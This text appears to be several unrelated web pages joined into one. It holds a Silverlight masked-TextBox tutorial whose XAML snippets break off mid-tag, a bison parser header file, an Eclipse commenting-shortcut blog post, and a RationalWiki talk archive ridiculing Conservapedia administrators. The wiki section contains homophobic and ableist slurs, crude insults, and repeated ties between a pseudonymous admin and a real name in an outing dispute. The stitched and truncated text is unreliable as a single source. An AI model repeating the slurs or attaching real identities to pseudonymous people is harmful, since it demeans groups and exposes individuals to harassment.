        SpoonflowerItemInline,
    ]

But I still needed a way to prevent all of the inlines from being loaded. An Item sold on Etsy should only have the EtsyItemInline, an Item to be sold on Spoonflower should only load SpoonflowerItemInline, and so on. The first thing I needed to do was make it clear which online marketplace an Item is being sold on. So I went back to the model. My base Item model has a ForeignKey relationship to a seller account, which is in turn associated with a market name - I added a method extra_fields_by_market() to return a string (the desired inline name, based on the market name).

class Item(models.Model):
    account = models.ForeignKey(SellerAccount)
    ...

    def extra_fields_by_market(self):
        extra_inline_model = ''
        if self.account.market:
            extra_inline_model = str(self.account.market)+'ItemInline'
        return extra_inline_model

Then back in the admin, I overrode get_formsets_with_inlines(). This method yields formset/inline pairs, which allows me to limit which inlines are displayed for a given object. I was able to use it to display a specific inline only when it matches the market on a base Item:
http://www.mechanicalgirl.com/post/dynamic-inlines-django-admin/
CC-MAIN-2021-17
refinedweb
1,133
63.09
the first custom widget that can paint itself. We also add a useful keyboard interface (with two lines of code). This file is very similar to the lcdrange.rb in Chapter 7. We have added one slot: setRange(). We now add the possibility of setting the range of the LCDRange. Until now, it has been fixed at 0 to 99. def setRange(minVal, maxVal) if minVal < 0 || maxVal > 99 || minVal > maxVal qWarning("LCDRange::setRange(#{minVal}, #{maxVal})\n" + "\tRange must be 0..99\n" + "\tand minVal must not be greater than maxVal") return end @slider.setRange(minVal, maxVal) end The setRange() slot sets the range of the slider in the LCDRange. Because we have set up the Qt::LCDNumber to always display two digits, we want to limit the possible range of minVal and maxVal to avoid overflow of the Qt::LCDNumber. (We could have allowed values down to -9 but chose not to.) If the arguments are illegal, we use Qt's QtGlobal::qWarning() function to issue a warning to the user and return immediately. QtGlobal::qWarning() is a printf-like function that by default sends its output to $stderr. If you want, you can install your own handler function using QtGlobal::qInstallMsgHandler(). lcd.setSegmentStyle(Qt::LCDNumber::Filled) This makes our lcd numbers look way better. I'm not certain, but I believe what makes it possible to do this is setting a palette (see next section). What I do know is that this line has no effect when I tried it in previous chapters, but works here. @currentAngle = 45 setPalette(Qt::Palette.new(Qt::Color.new(250, 250, 200))) setAutoFillBackground(true) The constructor initializes the angle value to 45 degrees and sets a custom palette for this widget. This palette uses the indicated color as background and picks other colors suitably. (For this widget only the background and text colors will actually be used.) We then call setAutoFillBackground(true) to tell Qt fill the background automatically. The Qt::Color is specified as a RGB (red-green-blue) triplet, where each value is between 0 (dark) and 255 (bright). We could also have used a predefined color such as Qt::yellow instead of specifying an RGB value. def setAngle(angle) if angle < 5 angle = 5 elsif angle > 70 angle = 70 end if @currentAngle == angle return end @currentAngle = angle update() emit angleChanged(@currentAngle) end def setAngle(degrees)t::Widget: Ruby syntax. def paintEvent(event) painter = Qt::Painter.new(self) painter.drawText(200, 200, tr("Angle = #{@currentAngle}")) painter.end() end This is our first attempt to write a paint event handler. The event argument contains a description of the paint event. Qt::PaintEvent contains the region in the widget that must be updated. For the time being, we will be lazy and just paint everything. Our code displays the angle value in the widget at a fixed position. We create a Qt::Painter operating on this widget and use it to paint a string. We'll come back to Qt::Painter later; it can do a great many things. angle = LCDRange.new() angle.setRange(5, 70) In the constructor, we create and set up the LCDRange widget. We set the LCDRange to accept angles from 5 to 70 degrees. cannonField = CannonField.new(). gridLayout = Qt::GridLayout.new() So far, we have used Qt::VBoxLayout for geometry management. Now, however, we want to have a little more control over the layout, and we switch to the more powerful Qt::GridLayout class. Qt::GridLayout isn't a widget; it is a different class that can manage the children of any widget. 
We don't need to specify any dimensions to the Qt::GridLayout constructor. The Qt::GridLayout will determine the number of rows and columns based on the grid cells we populate. The diagram above shows the layout we're trying to achieve. The left side shows a schematic view of the layout; the right side is an actual screenshot of the program. (These two images are copyrighted/owned by Trolltech.)t::GridLayout that the right column (column 1) is stretchable, with a stretch factor of 10. Because the left column isn't (its stretch factor is 0, the default value), Qt::Grid? Try to change "Quit" to "&Quit". How does the button's look change? ( Whether it does change or not depends on the platform.) What happens if you press Alt+Q while the program is running? Center the text in the CannonField.
https://techbase.kde.org/index.php?title=Development/Tutorials/Qt4_Ruby_Tutorial/Chapter_08&oldid=47844
CC-MAIN-2015-11
refinedweb
739
66.94
Creating Class Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 16:13:00 0 In my study book it wants me to create a class named Numbers whose main() method holds two integer variables. It wants me to create two additional methods,sum() and difference(), that compute the sum of and the difference between the two variables, once I have assigned values to the variables. I am having trouble with this. If someone could help me and give a reason behind their answer, that would be great. Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 16:41:00 0 > I am having trouble with this. > If someone could help me and give a reason behind their answer,... it is far better for you to describe the trouble you are having. post the code you have tried, and 'what you get' vs 'what you expect' [ October 08, 2006: Message edited by: Michael Dunn ] Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 17:07:00 0 The trouble that I am having is I am able to write the code up to giving the int a and int b a value and then I seem to get very confused on the rest. The part about having it add and subtract the values is getting me stuck. [ October 08, 2006: Message edited by: Cortney Parsons ] Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 17:22:00 0 > I am able to write the code up to giving the int a and int b a value show us your program that does this much, and we'll try to give you a nudge in the right direction for the rest. Cortney Parsons Greenhorn Joined: May 29, 2006 Posts: 4 posted Oct 08, 2006 18:43:00 0 public class numbers { public static void main (int a, int b) { int a=10, int b=8; Henry Wong author Sheriff Joined: Sep 28, 2004 Posts: 18824 40 I like... posted Oct 08, 2006 18:57:00 0 What happens when you try to compile and run the program -- meaning what is the exception that you are getting? As a hint, take a look at the signature of the main() methods of other programs. Notice how is it different from yours. Henry Books: Java Threads, 3rd Edition , Jini in a Nutshell , and Java Gems (contributor) Michael Dunn Ranch Hand Joined: Jun 09, 2003 Posts: 4632 posted Oct 08, 2006 19:41:00 0 1) public static void main (int a, int b) assuming you can get it to compile OK, it won't run because your main() does not match the method signature required to start a program. There should be plenty of sample public static void main(...) in your book, so check how the method should be written. 2) int a=10, int b=8; you cannot specify 'types', separated by commas (even if they are the same) either separate them by a semi-colon, or remove the 'int' from b 3) if you fix (1) you won't have this problem, but at the moment you have 2 x local variables named a, and 2 named b - these will generate "already defined errors" 4) class numbers technically won't affect the running of a program, but Sun's naming conventions have classes starting with a capital letter i.e. Numbers, and following the conventions is a good habit to get into. if you fix 1 and 2, you should have your opening requirement, a program with 2 int variables (doubtful you are required to pass them to the program as arguments). 
from there you want to create and call a method to add the 2 numbers, so your method will look something like this accessor|return type|method name|arguments accessor: public private etc return type: String int double etc, can be void method name: in this case sum arguments: can be no arguments () or one, methodName(float f) or more, mthodName(float f,double d)//here is where 'types' are comma-separated if, in the signature, you have a non-void return type, you must include in the method a return statement that returns a value of a type that matches that in the method signature e.g. if your method signature starts public String...... you must include in the method public String...... { ... return someStringValue; } so, for your sum(), you would pass to it the 2 arguments of the a and b variables in main(), then within sum() you would create another variable to represent the sum of the 2 arguments, then return the 'sum' variable. It is important to understand that sum() will be working with the argument names supplied in the method, not the names of the variables passed to the method e.g. it might seem easier for you to write this public int sum(int a, int b) { //add up a and b return addedNumber; } but using the same variable names could confuse you when it comes to variable scope. the variable names of a and b here sum(int a, int b) could be any name at all sum(int x, int y) which means //add up a and b becomes //add up x and y you want to use the value in main(), so it is easier to create a variable to hold the return value from sum() int a = 8, b = 10; int numbersAdded = sum(a,b);//note - you only pass the name, not the type. now you have the added value in main() and you can do anything you want with it, print it out, to check accuracy, use it in another calculation etc. repeat above for difference(), and you should just about have it I agree. Here's the link: subject: Help Creating Class Similar Threads So, which of these would be... Performing math equations within arrays Create a Die Class merging two HashMaps Instance Variables & Class Variables All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/405029/java/java/Creating-Class
CC-MAIN-2014-41
refinedweb
1,022
64.88
Git workflow This guide explains how to update your local copy of pmaports.git, and how to contribute back changes (e.g. after creating a new device port). It is suitable for people who have not used git before. Contents The basics pmaports dir During pmbootstrap init, the whole pmaports.git repository was cloned to your computer. You can use pmbootstrap config aports to see the path, and if you chose the default work path, you will get: $ pmbootstrap config aports ~/.local/var/pmbootstrap/cache_git/pmaports All commands below need to be executed in your pmaports dir. It's a good idea to make accessing this directory easy with a short command, so consider setting up a shell alias. For bash this can be done by adding alias pma="cd ~/.local/var/pmbootstrap/cache_git/pmaports" to ~/.bashrc. Updating pmaports (rebasing on master) Since we are dealing with a git repository, pmbootstrap leaves the directory alone after the initial clone. It will not automatically update it. The only thing it will do is tell you when your pmaports.git dir is so outdated that you absolutely have to update it, or otherwise it would be incompatible with your pmbootstrap version. But you can always manually update the pmaports.git directory, and it is recommended to do so before you start or continue with making changes to the repository. Make sure that you are on master If you never ran any git commands in this directory before, you will still be on the master branch. Otherwise, run this command to check the branch name (there is also git branch, but we do have a lot of branches, so the one below is probably easier). Switch back to master if necessary with git checkout master. $ git rev-parse --abbrev-ref HEAD master (You may want to extend your shell to automatically display the branch name when you are inside a git directory, e.g. by using grml-zsh-config and ZSH.) Put your changes into a new branch Check if you made any changes to your pmaports dir. Changes could come from starting a new device port, for example. When you have made no changes, you can move on to the next step ("Running 'git pull'"): $ git status On branch master Your branch is up to date with 'origin/master'. nothing to commit, working tree clean When you have made changes, git status will list the files that were changed: $ git status On branch master Your branch is up to date with 'origin/master'. Changes not staged for commit: (use "git add <file>..." to update what will be committed) (use "git checkout -- <file>..." to discard changes in working directory) modified: device/device-lg-mako/APKBUILD no changes added to commit (use "git add" and/or "git commit -a") Create a new branch, commit the changes and go back to the master branch: $ git checkout -b mynewbranch M device/device-lg-mako/APKBUILD Switched to a new branch 'mynewbranch' $ git add -A $ git commit -m "describe your change here" [mynewbranch c9c729a5] describe your change here 1 file changed, 1 insertion(+), 1 deletion(-) $ git checkout master Switched to branch 'master' Your branch is up to date with 'origin/master'. Note that there are best practices for commit messages, and for commits that actually make it into the master branches of pmaports.git, we try to stick to them. Type git commit instead of git commit -m "describe your change here" and your editor will show up, where you can type in a pretty commit message. You can change the default editor by changing the EDITOR environment variable. 
Running 'git pull' Let's fetch the changes from the official postmarketOS repository and apply them to the current branch. Git will even show a nice overview of the files that have been changed, and how many lines have changed. $ git pull Updating e8a7926e..8909e932 Fast-forward coreapps/coregarage/APKBUILD | 24 ++++++++++++++++++++++++ ... 26 files changed, 307 insertions(+), 181 deletions(-) create mode 100644 coreapps/coregarage/APKBUILD ... If you did not have any local changes, then you are done here. Updating your branch(es) Put all new commits from master into your own branch, and then apply the changes you made on top of that: $ git checkout mynewbranch Switched to branch 'mynewbranch' $ git rebase master First, rewinding head to replay your work on top of it... Applying: description here If there are any conflicts, pay attention to the git output and run git diff to see where the conflicts are. Edit the files in a text editor, run git add -A and then continue the rebase. Creating a merge request Preparation These steps only need to be done the first time. Forking the repository We are currently using GitLab for development. Login to the website, and click here to fork pmaports.git to your own user's namespace. If you have just registered at GitLab, create a SSH key and store it in the settings. Add your fork as remote Run this, but replace USERNAME twice with your GitLab username. $ git remote add USERNAME git@gitlab.com:USERNAME/pmaports.git Push changes to your fork The first time you try to push your changes (upload them), git won't know where you want to put them: $ git push fatal: The current branch mynewbranch has no upstream branch. To push the current branch and set the remote as upstream, use git push --set-upstream origin mynewbranch So we will tell git the remote we would like to use. $ git push --set-upstream USERNAME mynewbranch Enter passphrase for key '/home/user/.ssh/id_rsa': Counting objects: 59, done. Delta compression using up to 2 threads. Compressing objects: 100% (39/39), done. Writing objects: 100% (59/59), 13.48 KiB | 1.68 MiB/s, done. Total 59 (delta 29), reused 0 (delta 0) remote: remote: To create a merge request for mynewbranch, visit: remote: remote: To gitlab.com:USERNAME/pmaports.git * [new branch] mynewbranch -> mynewbranch Branch 'mynewbranch' set up to track remote branch 'mynewbranch' from 'USERNAME'. When you want to push more changes, you can simply use git push for this branch. There is also git push --force, which can be used to override commits without creating new ones. You can use it after rebasing your branch on master (as explained above). git rebase -i master is a powerful command to edit previous commits, the -i option stands for interactive. See git-rebase.io for an in depth tutorial on interactive rebasing. Create the MR Simply click the link shown in the git output above, to create the new merge request. Pay attention to the text shown there, following it closely will make sure that your merge request gets merged to master as fast as possible. See also - in depth interactive git rebase tutorial (explains fixing previous commits, squashing commits, splitting one commit into several, reordering commits, etc.)
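As a concrete reference, a conflict during that rebase step is usually resolved with a short sequence like the one below (the file name is just the example used earlier on this page; your paths and output will differ):

$ git rebase master
...
CONFLICT (content): Merge conflict in device/device-lg-mako/APKBUILD
$ git diff                                # inspect the conflict markers
$ nano device/device-lg-mako/APKBUILD     # resolve the conflict by hand (use any editor)
$ git add -A
$ git rebase --continue

After the rebase has finished, git push --force updates the already-pushed branch in your fork as described above.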
https://wiki.postmarketos.org/index.php?title=Git_workflow&mobileaction=toggle_view_mobile
CC-MAIN-2019-26
refinedweb
1,143
72.05
Masonite 1.6 brings mostly minor changes to the surface layer of Masonite. This release brings a lot of improvements to the engine of Masonite and sets up the framework for the release of 2.0. Previously, all cookies were set with an HttpOnly flag. This change came after reading several articles about how cookies can be read from JavaScript libraries, which is fine, unless those JavaScript libraries have been compromised, which could lead to a malicious hacker sending your domain name and session cookies to a third party. There is now the ability to turn the HttpOnly flag off when setting cookies by creating cookies like:

request().cookie('key', 'value', http_only=False)

Because craft is essentially its own tool and it needs to work across Masonite versions, all commands have been moved into the Masonite repository itself. Now each version of Masonite maintains its own commands. The new craft version is 2.0:

pip install masonite-cli==2.0 --user

Before, you had to use the Manager class associated with a driver to switch a driver. For example:

def show(self, Upload, UploadManager):
    Upload.store(...)                      # default driver
    UploadManager.driver('s3').store(...)  # switched drivers

Now you can switch drivers from the driver itself:

def show(self, Upload):
    Upload.store(...)               # default driver
    Upload.driver('s3').store(...)  # switched drivers

This version has been fine-tuned for adding packages to Masonite. This version will come along with a new Masonite Billing package. The development of Masonite Billing has uncovered some rough spots in package integrations. One of these rough spots was adding controllers that were not in the project. For example, Masonite Billing allows adding a controller that handles incoming Stripe webhooks. Although this was possible before this release, Masonite 1.6 has added a new syntax:

ROUTES = [
    ...
    # Old Syntax:
    Get().route('/url/here', '[email protected]').module('billing.controllers'),
    # New Syntax:
    Get().route('/url/here', '/[email protected]'),
    ...
]

Notice the new forward slash at the beginning of the string where the controller goes. Previously, controllers were created exactly as specified. For example:

$ craft controller DashboardController

created a DashboardController. Now the "Controller" part of the name is appended by default for you, so we can just specify:

$ craft controller Dashboard

to create our DashboardController. You may want to actually just create a controller called Dashboard. We can do this by specifying a flag (short for "exact"):

$ craft controller Dashboard -e

It's also really good practice to create one controller per "action type." For example we might have a BlogController and a PostController. It's easy to be unsure which action should go in which controller or what to name your actions. Now you can create a "Resource Controller" which will give you a list of actions such as show, store, create, update and so on. If what you want to do does not fit an action you have, then you may want to consider making another controller (such as an AuthorController). You can now create these Resource Controllers like:

$ craft controller Dashboard -r

Just like the global controllers, some packages may require you to add a view that is located in their package (like the new exception debug view in 1.6), so you may now add views in different namespaces:

def show(self):
    return view('/masonite/views/index')

This will get a template that is located in the masonite package itself. You can now group routes based on a specific string prefix.
This will now look like:

routes/web.py

from masonite.helpers.routes import get, group

ROUTES = [
    get('/home', ...),
    group('/dashboard', [
        get('/user', ...),
        get('/user/1')
    ])
]

which will compile down into /dashboard/user and /dashboard/user/1. The container was one of the first features coded in the 1.x release line. For Masonite 1.6 we have revisited how the container resolves objects. Before this release you had to put all annotated parameters at the back of the parameter list:

from masonite.request import Request

def show(self, Upload, request: Request):
    pass

If we put the annotation at the beginning it would have thrown an error because of how the container resolved. Now we can put them in any order and the container will grab each one and resolve it.

from masonite.request import Request

def show(self, Upload, request: Request, Broadcast):
    pass

This will now work when previously it did not. The container will now resolve instances of classes as well. It's a common paradigm to "code to an interface and not an implementation." Because of this paradigm, Masonite comes with contracts that act as interfaces, but in addition to this, we can also resolve instances of classes. For example, all Upload drivers inherit the UploadContract contract, so we can simply resolve the UploadContract, which will return an Upload driver:

from masonite.contracts.UploadContract import UploadContract

def show(self, upload: UploadContract):
    upload.store(...)

Notice here that we annotated an UploadContract but got back the actual upload driver. You can now search the container and "collect" objects from it by key using the new collect method:

app.collect('Sentry*Hook')

which will find all keys in the container such as SentryExceptionHook and SentryWebHook and make a new dictionary out of them. A complaint a few developers pointed out was that Masonite has too many dependencies. Masonite added the Pusher, Ably and Boto3 packages by default, which added a bit of overhead, especially for developers who have no intention of using real-time event broadcasting (which most applications probably won't). These dependencies have now been removed, and an exception will be thrown if the corresponding features are used without the required dependencies installed. Masonite 1.6+ will slowly be rolling out various framework hooks. These hooks will allow developers and third-party packages to integrate into various events that are fired throughout the framework. Currently there is the ability to tie into the exception hook, which will call any objects loaded into the container whenever an exception is hit. This is great if you want to add things like Sentry to your project. Other hooks will be implemented, such as View, Mail and Upload hooks.
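To make the "code to an interface" idea more tangible, here is a toy sketch in plain Python — it is not Masonite's actual container implementation, just an illustration of resolving a binding by the contract it implements:

import abc

class UploadContract(abc.ABC):
    @abc.abstractmethod
    def store(self, filename):
        ...

class DiskDriver(UploadContract):
    def store(self, filename):
        return 'stored {} on disk'.format(filename)

# A minimal "container": bindings keyed by name
bindings = {'Upload': DiskDriver()}

def resolve(contract):
    # Hand back the first binding that implements the requested contract
    for obj in bindings.values():
        if isinstance(obj, contract):
            return obj
    raise LookupError('nothing bound for {}'.format(contract))

print(resolve(UploadContract).store('avatar.png'))  # stored avatar.png on disk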
https://docs.masoniteproject.com/whats-new/masonite-1.6
CC-MAIN-2020-34
refinedweb
1,006
55.95
Coding standards increase productivity in the development process, make code easier to maintain, and keep code from being tied to one person or team. But where should standards come from? How extensive should they be, and more importantly, who should enforce them? Here are the short answers to these questions. Who dictates the coding standards? You can choose from many industry coding standards. Some companies—Microsoft and Sun Microsystems, for example—offer guidelines. Some coding standards, such as Hungarian Notation, are the product of one person’s labor (in this case, Dr. Charles Simonyi, a Hungarian software developer at Microsoft). Certain coding standards are language specific. Standards for Visual Basic dictate that you should prefix all textboxes with ”txt” and all buttons with ”cmd.” Sun Microsystems offers coding standards for Java. Once you’ve settled on a coding standard, take the language-specific suggestions and add your own. For example, you might decree that variable and function names should be descriptive, or that the behavior of particular functions must be clearly commented. (My mantra is “Document, document, document: every class, every method, every few lines of code.”) How extensive should coding standards be? While it’s important to have coding standards, it’s equally important not to have superfluous coding standards. Imagine, if you will, a standard that dictates that the first character of a variable name must indicate the application in which it resides, the second character must indicate the module, and the third character must indicate the data type. Excessive coding standards such as this can impede the creative process and become a hindrance to development. You should not have more coding standards than will fit on one or two pages. It makes it very hard to name your variable if you have to consult a chart to do so. Who enforces coding standards? I’ve worked in many software shops where coding standards existed, but no one enforced them. The result: The coding standards were about as effective as the “So, come here often?” pickup line. The first step in enforcing coding standards is to keep those standards easily accessible. Ideally, you should have a laminated cheat sheet pinned up in each developer’s cube. During peer code review sessions, someone’s job must include being code standards bad cop. However, automated tools offer another option to managers looking to enforce standards. Some of the best tools on the market are made by Parasoft. Parasoft produces language-specific tools that automatically enforce more than 300 coding standards. The products include a RuleWizard feature, which allows developers to create and implement their own custom rules. I will review Parasoft products in future articles. One of the standards enforced by Parasoft products requires that one-character variable names be used only for their conventional purpose, such as b for a byte, c for a char, f for a float. If this standard is violated, the output would look like this: package examples.rules.naming; public class CVN { void method () { int b = 1; // VIOLATION } } Conclusion Coding standards are a must for any development team. They ensure consistency and simplify the maintenance process with legible code. Your job is to make sure a standard is chosen, strictly followed, and always on the developer’s mind.
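Returning to the Parasoft example above: a version of that method that would satisfy the naming rule simply gives the variable a descriptive name (the name below is invented purely for illustration):

package examples.rules.naming;

public class CVN {
    void method() {
        // Descriptive names (or the conventional single letters, e.g. 'c' for a char)
        // keep automated standards checkers such as the one described above happy.
        int retryCount = 1;
    }
}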
http://www.techrepublic.com/article/coding-standards-101/
CC-MAIN-2017-43
refinedweb
544
56.96
please I want to reverse word using stl like that input this is a test output test a is this This is a discussion on Reverse Words within the C++ Programming forums, part of the General Programming Boards category; please I want to reverse word using stl like that input this is a test output test a is this... please I want to reverse word using stl like that input this is a test output test a is this Show the code that you have so far. Kurt but it didnt work :/but it didnt work :/Code:#include<iostream> #include<string> #include<vector> using namespace std; int main() { string str; int x; vector<string>v; cin>>x; cin.ignore(); for(int i=1;i<=x;i++) { getline(cin,str); str.rbegin()==str.rend(); cout<<"Case #"<<i<<": "<<str<<endl; } return 0; } Line 15 does not do anything. My homepage Advice: Take only as directed - If symptoms persist, please see your debugger Linus Torvalds: "But it clearly is the only right way. The fact that everybody else does it some other way only means that they are wrong" how could i reverse a vector with string???? This is not a free code factory and it is not a free homework factory, and you will not get help here unless you demonstrate effort to solve the problem (i.e. post something that people can look at and realise you have genuinely tried). At this stage, your code reads strings, but neither inserts any of those strings into the vector, and also demonstrates no attempt to reverse anything. So you're not meeting your side of the deal. And hacking at random and bluffing will not work. The solution is VERY simple, so we know what people will probably do if they genuinely try. Last edited by grumpy; 08-04-2012 at 05:03 PM. Right 98% of the time, and don't care about the other 3%. I am really tried and I am already studied stl so I tried to solve this problem so I want to know how to reverse a string with vector and I search on the internet to find but it didn't work I'm sorry if I bothered you Last edited by sarasaad; 08-04-2012 at 05:14 PM. Your code does not actually use the vector that you declared. If you put each of the words in the vector, all you really have to do is figure out how to arrange the output in reverse.
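For anyone finding this thread later, one possible sketch of the approach being hinted at — read the words into the vector, then walk it backwards — is below (illustrative only, written against the original "this is a test" example):

#include <iostream>
#include <sstream>
#include <string>
#include <vector>
using namespace std;

int main()
{
    string line;
    getline(cin, line);            // e.g. "this is a test"

    // Split the line into words and store them in the vector
    istringstream iss(line);
    vector<string> words;
    string word;
    while (iss >> word)
        words.push_back(word);

    // Print the words in reverse order: "test a is this"
    for (vector<string>::reverse_iterator it = words.rbegin(); it != words.rend(); ++it)
        cout << *it << ' ';
    cout << endl;

    return 0;
}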
http://cboard.cprogramming.com/cplusplus-programming/150042-reverse-words.html
CC-MAIN-2014-41
refinedweb
421
74.83
- . wow, im cool Admin Well, at least it worked... kind of... Admin No, you have too much free time ;) Admin 4th place! not bad... Admin wow. that's all I'm going to say. Admin WTF??!? This guy is obviously an old-sk00l shell scripter who has just learned python. I've seen stuff like this as a BASH script too many times to count. Admin The sad thing is how often this happens. I was hired once to rewrite the back-end a non-functional adult website (no puns intended). The Perl scripts the last 60-an-hour consultant wrote were littered with backticked calls to MySQL. Admin Admin Can someone port this to Windows for me? [:P] (I see that one way or another, the forum software is going to have to change...[8-)]) Admin This could be a useful trick if you're using an obscure scripting language that really doesn't have MySQL drivers >:-) --Daniel T Admin So I guess reposting old WTF's is a good way to say he's run out of real coding errors? Admin Wow, did the author of one of the WTF's get pissed at Alex or something? Regretfully changing the software won't keep this from happening. Even if you are required to sign up first this guy can sign up, post get banned and sign up again using yet another msn or hotmail address. ____________ I am that signature virus, propogating in an assited manner. Admin A co-worker pointed out to me... Judging from the setting, it was probably some poor kid fresh out of Programming 101 with no clue about database libraries, getting paid $5/hour to build this script. If it was in an professional/enterprise/production setting, fine, it's a WTF - in this case, it's probably just a clever student. --Daniel T Admin One more comment ;-) That screenshot is from EditPlus, isn't it? I love it!!!! --Daniel T Admin This guy probably heard that "Python is a scripting language" so he's using it as a replacement for #!/bin/sh instead of the full-featured programming language that it is. Admin Slightly more sophisticated software could weed out excessive repetitions, maybe. Also, just a line of code could get rid of those Javascript "injections." Admin Yes, but that's Perl - backticked calls to external programs are a long-standing tradition (albeit in this case a WTF-worthy one). Python makes you jump through slightly more hoops to do the same thing (and probably with good reason). Admin Slash ( ) does a very good job at filtering out trolls. Admin For what it's worth, the MySQL shell tool outputs tab separated values. So the script won't "fail if anything resembling a space is present in the database", just if there's a tab. Admin You wish. For example, I took a look at the LiveJournal code, and while the comment-parsing code is fairly secure (due to a paranoid HTML parser and rewriter) it had a number of additional checks required to handle web-browser specific quirks in parsing HTML, which obviously only got added in response to people noticing security holes. Also, anything short of a full parser (ideally whitelisting), preferably rewriting the HTML in an unambiguous fashion, probably won't cut it reliably due to various... interesting tricks involving HTML entities, comments, punctuation and the like. Admin ... as opposed to a language whose selling point is integration with the database at the web server. Lets not forget that this code isn't running anywhere near a backend. This code runs where UI is rendered. :) Admin Haha, my apologies to the Python coders (really!). I don't know why I read this post as PHP. Maybe the syntax coloring <g>. 
Admin Except the script uses .split(), not .split('\t'), so it will split fields on any whitespace, not just tabs. Admin Amusingly, as long as you have a cygwin/mingw compile of mailman sitting in c:\usr\local\mailman (or whatever your system drive is), this python script would work just fine, fwiw. :p (Unless they're shell scripts, guess you'd have to replace them with batch files that ran them inside the cygwin environment.) Thankfully I can't see whatever got posted, and I don't really care anyway as long as it isn't another goatse. But I am a bit worried that next up is IE/ActiveX exploits. Admin and r. flowers, I find your avatar a bit umm, disturbing. Not that that is a bad thing. I think the only way to be rid of things like this is to deny all javascript and html and just simply block text all replies. Even then you won't have a decent way around repeated lines in a post or even for someone to copy the entire first chapter of a novel into the post and upload, no repitition is necessary. This then leads to the question of how long can a post get before you truncate it? There is no perfect answer. CAPTCHA = register (is someone trying to tell me something?) Admin I think I will change it. He's starting to disturb me, too. I found him by doing a Google image search for "WTF." Admin Don't know about that; someone was injecting invisible JavaScript that would quietly post a comment on IE on some of the other forum threads earlier, though. (At least, it would if it actually worked - so many script kiddies just don't test their code properly. I really don't know what the world is coming to...) Besides, I use Konqueror, so I'm probably safe (you can more-or-less use the forum, as long as you pretend to be an IE user and don't try and use the fancy WYSIWIG HTML editor/toolbar - would it kill them to write portable code for once?). Admin Yes. It was part of the deal that Bill signed with the Devil. Admin I actually like the general approach for its decoupling qualities: - No need to link a specific database library into the server - Easily adaptable to other database CLIs - at least in theory - Execution time is generally not an issue this days on web servers (unless you run Slashdot or some other popular site) Admin Now you're just trolling, aren't you? BTW, does Python have weak references? I just read an introductary book and there was no mention of this feature. Admin I like its highly modular architecture. It seems that /usr/local/mailman/bin/list_lists, /usr/local/mailman/bin/newlist and /usr/local/mailman/bin/rmlist are all separate scripts, called by os.popen and the like. They might be even some bash for all we know. And intermediate mysql_cmds.txt is probably being created for efficiency reasons - the coder must have thought it's faster to have one call to os.* than thousands. This is optimization gone the absolutely wrong way. But it's nice he put some effort into it... 
Admin Quoting "I just read an introductary book and there was no mention of this feature." — here's an example:

import weakref

class A(object):
    def method(self):
        return 1337

a = A()
a_weak = weakref.ref(a)

# Calling the weakref will reveal the object if it still exists
print a_weak(), a
# <__main__.A object at 0x732d0> <__main__.A object at 0x732d0>

print a_weak().method()
# 1337

a = "Not the A you are looking for"
print a_weak()
# None

Admin What I like about this code is how they are using "Python" as if it were bash, ignoring every possibility to use a normal database driver or mailman libraries. Of course, using Python instead of, say, bash will make it a bit easier to split those lists by [a for a in existing if not a in db_list_names], but that is about the only Pythonish thing in the code - which of course in newer Pythons is done faster and easier by using sets.

Admin Full documentation at - as well as Python's standard weak references, there's also weakref proxy objects (which act almost like the actual object referred to - not a good idea to use carelessly, since they might disappear at any moment) and dictionaries with weak keys/values.

Admin If you're looking for something in Python, first stop is the Global Module Index, always (second one is the standard library reference). And in the Module Index you can find the Weakref module, introduced in Python 2.1. (oh, and for the people who don't know Python, it has at least 1 or 2 mysql modules, at least one of which is more or less compliant with Python's DB API 2.0)

Admin Yes, it does. Use the weakref module.

Admin I don't know - does C or C++?

Admin Python is my favorite general-purpose scripting language (rather fond of JavaScript, but it has pretty narrow applications), but I didn't know about this syntax which still kind of blows my mind: This is definitely not typical Bourne-shell style. Seems like the bass-ackwards kind of thing that might be possible in Perl, however.

Admin That's a list comprehension. It's equivalent to a plain for loop that appends each item matching the condition to a new list.

Admin They don't need those temporary files proc_open -- Execute a command and open file pointers for input/output

Admin oops. Didn't really read the code, beyond noticing mysql and the temp files. not php

Admin, the python equivalent of php's proc_open

Admin My goggles! The eyes do nothing! O_o

Admin Interesting, though I find this concept kind of hard to... um... understand.

Admin C++ - weak_ptr C - Shouldn't be hard to roll your own, what do you think most of these GC languages are written in?

Admin Probably the original coder didn't have root to install the "official" MySQLdb package. Rather than annoy the sysadmin (or attempt to install the MySQLdb package in his home directory), he decided to take matters into his own hands.

Admin Hey [I] , weren't there license restrictions with using MySQL client libraries - they first changed from lgpl -> gpl, then added the 3 licensing models: foss license, gpl license and commercial license? For a time being, the situation was gpl for client code. Dunno the exact circumstances today. [^o)]^ Also, efficient bulk importing and exporting are normally not exposed via python db api. Still WTF - for inserts etc this is weird. And the py is quite ugly.
And os.system is very expensive on win32. [N] Admin Then you'll love generator expressions: gen_exp = (a for a in something if a == 'foo') will produce a generator which will produce the list of all values in 'something' that is 'foo'. So like a list comprehension but produces its values lazily. Produce a list from that with list(gen_exp) :) Admin List comprehensions are the gift from god. So many stupid for loops can be stuffed into a little list comprehension. If you want to have a crash course in generator expressions and list comprehensions, take a good look at the results of the Python Coding Contest[1] that was held in the last week of last year; nearly all solutions used three nested generator expressions, except the winning one, which managed to use only two. On second thoughts, maybe it's not so good for beginning Python coders to look at this code. ;-) [1] Admin fuck you guys are nerds go play wow or some shit
http://thedailywtf.com/articles/comments/Real_Coders_Don_0x27_t_Need_Drivers
CC-MAIN-2017-30
refinedweb
1,955
71.75
